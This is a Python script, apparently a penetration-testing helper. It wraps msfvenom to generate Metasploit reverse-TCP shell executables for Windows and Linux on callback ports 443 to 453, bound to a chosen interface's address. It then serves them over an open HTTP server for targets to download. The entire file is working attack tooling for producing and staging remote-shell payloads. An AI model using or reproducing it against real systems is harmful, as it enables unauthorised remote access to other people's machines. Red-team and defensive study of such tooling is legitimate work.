payload_gen.py
#!/usr/bin/python3
''' Script for automatically generating msf payloads
'''
import argparse
import http.server
import os
import socketserver
import subprocess
import sys
import net_utils
# Directory holding this script (symlinks resolved). Everything the script
# writes goes under its "payloads" subdirectory.
DIR = os.path.dirname(os.path.realpath(__file__))
PAYLOAD_DIR = os.path.join(DIR, "payloads")

# msfvenom payload name -> output filename template. The "%d" slot is filled
# with the callback port, so each (payload, port) pair gets its own file.
PAYLOADS = {
    "windows/x64/shell/reverse_tcp": "rshell64-%d.exe",
    "windows/shell/reverse_tcp": "rshell32-%d.exe",
    "linux/x64/shell/reverse_tcp": "rshell64-%d",
    "linux/x86/shell/reverse_tcp": "rshell32-%d"
}

# Callback ports 443 through 453 inclusive (range() excludes its end value).
PORTS = range(443, 454)
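def check_msfvenom():
    """Exit the script unless an ``msfvenom`` executable is found on PATH.

    Raises:
        SystemExit: with an error message when msfvenom cannot be located.
    """
    # Imported locally: the file's import block does not include shutil.
    import shutil

    # shutil.which performs the PATH lookup in-process, so the check does not
    # depend on an external `which` binary being installed. It also replaces
    # the original `returncode is not 0`, an identity test against an int
    # literal that newer interpreters flag with a SyntaxWarning.
    if shutil.which("msfvenom") is None:
        sys.exit("[ERROR] Could not find msfvenom in you path")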
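def gen_reverse_shell(payload, out_file, lhost, lport):
    """Run msfvenom once to write a single reverse-TCP payload file.

    Args:
        payload: msfvenom payload name. Names starting with "windows" are
            written in "exe" format, everything else in "elf".
        out_file: path handed to msfvenom's ``-o`` option.
        lhost: callback address passed as ``LHOST``.
        lport: callback port passed as ``LPORT``; formatted with ``%d``, so
            it must be an integer.

    Returns:
        None. A one-line summary is printed on success, and an
        "Error generating" line when msfvenom exits non-zero.
    """
    desc = "%s -> %s -> tcp:%s:%d" % (out_file, payload, lhost, lport)
    exe_format = "exe" if payload.startswith("windows") else "elf"

    # The command is an argument list (no shell), so the values reach
    # msfvenom verbatim. Its stdout and stderr are discarded, which leaves
    # the exit status as the only failure signal available here.
    ret = subprocess.run(
        [
            "msfvenom", "-p", payload, "LHOST=%s" % lhost, "LPORT=%d" % lport,
            "-o", out_file, "-f", exe_format,
        ],
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
    )

    # Compare by value: the original `is not 0` was an identity test against
    # an int literal, which only works by CPython's small-int caching and
    # triggers a SyntaxWarning on newer interpreters.
    if ret.returncode != 0:
        print("Error generating: %s" % desc)
    else:
        print(desc)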
def gen_payloads(lhost, iface_dir):
    """Create every missing (payload, port) file under ``iface_dir``.

    Walks each entry of PAYLOADS against each port in PORTS, builds the
    output filename from the entry's template, and calls gen_reverse_shell
    only when that file is not already on disk. Existing files are never
    regenerated, even if they were built for a different ``lhost``.

    Args:
        lhost: callback address forwarded to gen_reverse_shell.
        iface_dir: directory the payload files are written into.
    """
    for payload, name_template in PAYLOADS.items():
        for port in PORTS:
            target = os.path.join(iface_dir, name_template % port)
            if os.path.exists(target):
                # Already generated on an earlier run; leave it alone.
                continue
            gen_reverse_shell(payload, target, lhost, port)
def host_payloads(lhost, lport, hosting_dir):
    """Serve ``hosting_dir`` over plain HTTP on ``lhost:lport`` until stopped.

    The process working directory is switched to ``hosting_dir`` first,
    because SimpleHTTPRequestHandler serves files relative to the current
    directory. That handler has no authentication or TLS and returns a
    directory listing when no index file is present, so every file under
    ``hosting_dir`` is readable by any host that can reach the address.

    Args:
        lhost: address to bind the listener to.
        lport: TCP port to listen on.
        hosting_dir: directory whose contents are exposed.
    """
    os.chdir(hosting_dir)
    bind_addr = (lhost, lport)
    with socketserver.TCPServer(bind_addr, http.server.SimpleHTTPRequestHandler) as httpd:
        print("Serving payloads on http://%s:%d/..." % bind_addr)
        # Blocks here; the call only ends when the process is interrupted.
        httpd.serve_forever()
def main():
    """Parse the command line, build the payload set, and optionally serve it.

    Steps, in order: confirm msfvenom is available, resolve the named
    interface to an address, make sure the per-address output directory
    exists, generate any missing payload files, and start the HTTP listener
    when a positive listen port was requested.
    """
    # msfvenom is a hard dependency, so check for it before anything else.
    check_msfvenom()

    cli = argparse.ArgumentParser(description='Gernerate and host msfvenom reverse payloads for ')
    cli.add_argument(
        'interface',
        help='name of the interface that will host payloads and be called back to')
    # Three cases: flag absent -> -1 (hosting disabled); bare "-l" -> None
    # (nargs="?" with no const); "-l N" -> N.
    cli.add_argument(
        '-l', dest='listen_port', default=-1, type=int, nargs="?",
        help='port to host the payloads on; defaults to 80 if only flag is provided')
    args = cli.parse_args()

    # NOTE(review): net_utils is project-local; presumably this returns the
    # interface's IPv4 address as a string (it is joined into a path below).
    ip = net_utils.get_iface_ipv4(args.interface)

    # Payloads are grouped in one directory per callback address.
    iface_dir = os.path.join(PAYLOAD_DIR, ip)
    if not os.path.exists(iface_dir):
        os.makedirs(iface_dir)

    gen_payloads(ip, iface_dir)

    # A bare "-l" means "host on the default port".
    if args.listen_port is None:
        listener = 80
    else:
        listener = args.listen_port

    # Non-positive values (including the -1 default) skip hosting entirely.
    if listener > 0:
        host_payloads(ip, listener, iface_dir)


if __name__ == "__main__":
    main()